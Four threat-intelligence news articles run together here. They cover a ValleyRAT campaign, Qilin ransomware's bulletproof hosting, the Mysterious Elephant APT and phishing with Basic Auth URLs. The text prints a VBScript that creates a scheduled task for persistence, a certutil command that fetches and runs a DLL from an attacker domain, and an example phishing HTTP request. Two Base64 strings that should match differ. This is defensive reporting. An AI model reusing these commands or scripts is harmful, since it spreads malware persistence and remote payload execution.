Over the past month, a targeted campaign dubbed Operation Silk Lure has surfaced, exploiting the Windows Task Scheduler to deploy a novel variant of ValleyRAT.

Emerging in mid-2025, the operation hinges on spear-phishing emails that carry malicious LNK attachments masquerading as candidate resumes.

When victims open these attachments, a hidden PowerShell command initiates the download of a decoy document and two executables: a loader (keytool.exe) and its side-loaded DLL (jli.dll).

Initial analysis reveals that the phishing lure is crafted for Chinese fintech and trading firms’ HR departments.

The malicious LNK file contains an obfuscated PowerShell one-liner, which silently retrieves payloads from a command-and-control (C2) server hosted in the United States.

Once executed, the dropper writes a VBScript named CreateHiddenTask.vbs into the user’s AppData folder, then runs it to establish persistence.

Seqrite researchers noted that this script programmatically registers a daily scheduled task named “Security,” spoofing Microsoft Corporation as the author, and immediately deletes itself to hinder detection.

Following the persistence step, the loader binary (keytool.exe) launches and uses DLL side-loading to execute jli.dll.

This DLL locates an 8-byte marker in its own file, extracts the subsequent encrypted payload, and performs RC4 decryption with a hard-coded key.

The decrypted shellcode is injected directly into memory, establishing contact with the C2 server at 206.119.175.16 and beginning reconnaissance and exfiltration.

Seqrite researchers noted that once inside, ValleyRAT engages in extensive data harvesting and defense-evasion maneuvers.

It fingerprints the host—collecting CPU details, screen resolution, and NIC information—while checking for virtualization or known antivirus products via WMI queries.

Detected security services, including 360Safe and Kingsoft, have their network connections forcefully terminated. All activities are logged and transmitted covertly over HTTPS, raising the risk of credential theft and corporate espionage.

Infection Mechanism and Persistence

A closer look at the infection chain uncovers the elegance of its persistence tactic. The VBScript used to register the scheduled task leverages COM interfaces to interact with the Task Scheduler.

Below is the core snippet from CreateHiddenTask.vbs:-

Set service = CreateObject("Schedule.Service")
service. Connect
Set rootFolder = service.GetFolder("\")
Set taskDef = service.NewTask(0)
With taskDef.RegistrationInfo
    .Author = "Microsoft Corporation"
End With
With taskDef.Triggers.Create(1)  ' DAILY trigger
    .StartBoundary = "2025-08-01T08:00:01"
    .DaysInterval = 1
End With
With taskDef.Actions.Create(0)   ' EXEC action
    .Path = ExpandEnvironmentStrings("%APPDATA%\keytool.exe")
End With
rootFolder.RegisterTaskDefinition "Security", taskDef, 6, "", "", 3

Upon registration, the task executes keytool.exe every morning at 8:00 AM. This mechanism ensures the loader runs consistently, even after system reboots.

By embedding author metadata and deleting the script, the threat actors blend into normal system activity, complicating forensic investigations.

The combination of LNK-based initial compromise, VBScript persistence, and DLL side-loading makes Operation Silk Lure a sophisticated threat demanding updated hunting signatures and vigilant monitoring of scheduled tasks.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Operation Silk Lure Weaponizing Windows Scheduled Tasks to Drop ValleyRAT appeared first on Cyber Security News.

The Qilin ransomware group has emerged as one of the most prolific and dangerous threat actors in the cybersecurity landscape, exploiting sophisticated bulletproof hosting infrastructure to conduct devastating attacks on organizations across multiple sectors.

Operating under a Ransomware-as-a-Service (RaaS) model, Qilin first surfaced in mid-2022 under the name “Agenda” before rebranding later that year.

The group has gained widespread notoriety for targeting healthcare organizations, government entities, critical infrastructure operators, and asset management firms worldwide.

Most notably, the gang recently claimed responsibility for the September 2025 ransomware attack that crippled operations at Asahi Group Holdings, Japan’s largest beverage manufacturer, forcing production shutdowns at most of its 30 factories for nearly two weeks.

The ransomware operation maintains variants written in both Golang and Rust programming languages, demonstrating technical versatility that enables cross-platform attacks.

According to the Health Sector Cybersecurity Coordination Center, Qilin gains initial access through spear phishing campaigns and leverages Remote Monitoring and Management (RMM) tools alongside other common penetration tools to establish persistence within compromised networks.

The group practices double extortion tactics, encrypting victim data while simultaneously exfiltrating sensitive information to pressure organizations into paying ransoms.

Their RaaS platform provides affiliates with user-friendly panels to configure attacks, manage victims, and negotiate ransoms, while maintaining a Data Leak Site on the Tor network for publishing stolen data.

Resecurity analysts noted that Qilin’s operations are deeply intertwined with an underground bulletproof hosting conglomerate that has origins in Russian-speaking cybercriminal forums and Hong Kong.

The threat actors have established strong connections to rogue hosting providers that enable them to operate with minimal oversight and maximum resilience against law enforcement intervention.

These bulletproof hosting services are incorporated in pro-secrecy jurisdictions and structured across complex webs of anonymous shell companies distributed geographically, creating safe havens for cybercriminals who wish to remain anonymous.

The group’s infrastructure relies heavily on providers such as Cat Technologies Co. Limited, a Hong Kong-based entity that shares business addresses with related companies including Starcrecium Limited in Cyprus and Chang Way Technologies Co. Limited.

Resecurity researchers identified that these entities serve as official representatives for Russia-based hosting provider Hostway.ru, which operates under the legal entity OOO “Information Technologies”.

Network analysis revealed that Qilin ransomware operations utilize IP addresses associated with these providers, with frequent changes to complicate tracking efforts.

In April 2024, researchers observed the group’s Data Leak Site mentioning IP addresses 176[.]113[.]115[.]97 and 176[.]113[.]115[.]209, both associated with Cat Technologies Co. Limited.

The business model of these bulletproof hosting providers thrives on zero Know Your Customer (KYC) protocols and complete absence of due-diligence checks.

They offer services ranging from $95 to $500 and beyond, depending on server configurations, with specialized offerings for mass scanning capabilities featuring network bandwidth up to 10 Gbps. One prominent provider, BEARHOST Servers—also known as Underground and Voodoo Servers—has been advertising directly on Qilin’s “WikiLeaksV2” platform.

Historical passive DNS records show this operation was hosted at IP 31[.]41[.]244[.]100 associated with Red Bytes LLC in Saint Petersburg, Russia.

The service has maintained active accounts on multiple underground forums including XSS and Exploit since at least 2019.

Bulletproof Hosting Infrastructure and Operational Resilience

The bulletproof hosting infrastructure supporting Qilin ransomware operations demonstrates remarkable resilience through sophisticated corporate structures designed to evade detection and law enforcement action.

Multiple legal entities share common directors and addresses, creating a complex web that shields the true operators from accountability.

Corporate records reveal that Mr. Lenar Davletshin serves as director of numerous entities including Chang Way Technologies Co. Limited, Starcrecium Limited, OOO “Red Byte,” OOO “Information Technologies,” OOO “Hostway,” OOO “Hostway Rus,” OOO “Triostars,” and OOO “F1″—all registered in Russia, Cyprus, and Hong Kong.

These hosting networks are frequently implicated in command-and-control server operations for various malware families including Amadey, StealC, and CobaltStrike.

The IP address 85.209.11.79, associated with this infrastructure, has been reported over 11,346 times to AbuseIPDB for malicious activity including exploit probing and network scanning.

The interconnected nature of these providers was further confirmed when U.S. Treasury Department sanctions in July 2025 targeted the Aeza Group for providing bulletproof hosting services to cybercriminals, specifically aiding ransomware groups like BianLian and hosting illicit drug markets such as BlackSprut.

Following increased scrutiny and multiple abuse complaints, BEARHOST announced in late December 2024 that their service would transition to private mode, accepting new customers only through vetting and invitations from existing clients.

This operational security adjustment represents a common pattern among established underground vendors who have built significant customer bases and seek to minimize exposure to law enforcement and cybersecurity researchers.

In May 2025, BEARHOST rebranded as “voodoo_servers” before ultimately announcing termination of services due to “political reasons,” executing what appears to be an exit scam that left customers without server access or fund returns while the underlying legal entities continued operations.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Qilin Ransomware Using Ghost Bulletproof Hosting to Attack Organizations Worldwide appeared first on Cyber Security News.

In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.

First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.

Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.

Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.

Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.

As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.

Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.

These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.

By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.

# Download and execute BabShell payload
certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPoint

Infection Mechanism

The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.

When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.

This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.

Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.

After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.

This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.

By avoiding disk writes, MemLoader HidenDesk significantly diminishes kinetic evidence, allowing Mysterious Elephant to navigate laterally and harvest target data undetected.

The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.

Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information appeared first on Cyber Security News.

Early October 2025 witnessed the resurgence of a retro phishing technique that exploits legacy Basic Authentication URLs to deceive users into divulging sensitive credentials.

Threat actors crafted links in the format https://username:password@domain.com, embedding a trusted institution’s domain in the username field to visually mimic legitimate services.

When users click these links, their browsers authenticate to the malicious domain specified after the @ symbol, silently harvesting the credentials intended for the forged site.

This tactic is particularly effective in mobile apps and email clients that truncate long URLs, showing only the deceptive portion before the @ symbol.

Netcraft analysts noted the first wave of these attacks targeting GMO Aozora Bank customers in Japan, where the attackers registered URLs such as hxxps://gmo-aozora.com%25TOKEN@coylums.com/sKgdiq.

Victims encountering these links in phishing emails were prompted to complete a Japanese-language CAPTCHA page designed to simulate a legitimate security check.

Despite modern browsers supporting Basic Auth URLs, this format has fallen out of favor due to security concerns, making it an unexpected vector that evades casual URL scrutiny.

Following the initial discovery, Netcraft researchers identified more than 200 unique Basic Auth phishing URLs in a two-week period.

Attacks impersonated major brands including Amazon, Google, and Netflix, often cloaking malicious domains behind familiar names.

One example spoofed Netflix, luring recipients into clicking a link that seemed legitimate but directed them to a credential-stealing script hosted on themiran.net.

The coordinated use of multiple malicious domains and encoded tokens strengthened the illusion of legitimate authentication flows.

Beyond simple credential harvesting, these phishing links also implemented human verification CAPTCHAs to delay automated takedown efforts and to reinforce trust among victims.

The CAPTCHA page emulated a security checkpoint, requiring users to click “I am not a robot” before proceeding to a counterfeit login form. This extra step both increased the perceived legitimacy of the page and gave attackers additional time to capture credentials.

Infection Mechanism and Credential Exfiltration

Upon clicking a compromised Basic Auth URL, the victim’s browser issues an HTTP GET request with the credentials field set to the trusted domain text.

For example:-

GET /sKgdiq HTTP/1.1  
Host: coylums.com  
Authorization: Basic Z21vLWFvem9yYS5jb206  

Here, Z21vLWFvem9ycmEuY29tOg== is the Base64-encoded representation of the string gmo-aozora.com:. The server decodes this header to confirm the presence of the embedded “username,” then serves the phishing page that mimics the bank’s login interface.

Submitted credentials are sent via a POST request to the attacker’s backend endpoint, where they are collected for later misuse.

This mechanism bypasses typical URL filters that focus on query strings rather than embedded authentication tokens.

By reviving this outdated HTTP feature, attackers have demonstrated how legacy standards can be repurposed for modern phishing campaigns.

Financial institutions and security teams should update URL inspection rules to detect and block Basic Authentication tokens in links and educate users about the dangers of unbeknownst embedded credentials.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Phishing Attack Uses Basic Auth URLs to Trick Users and Steal Login Credentials appeared first on Cyber Security News.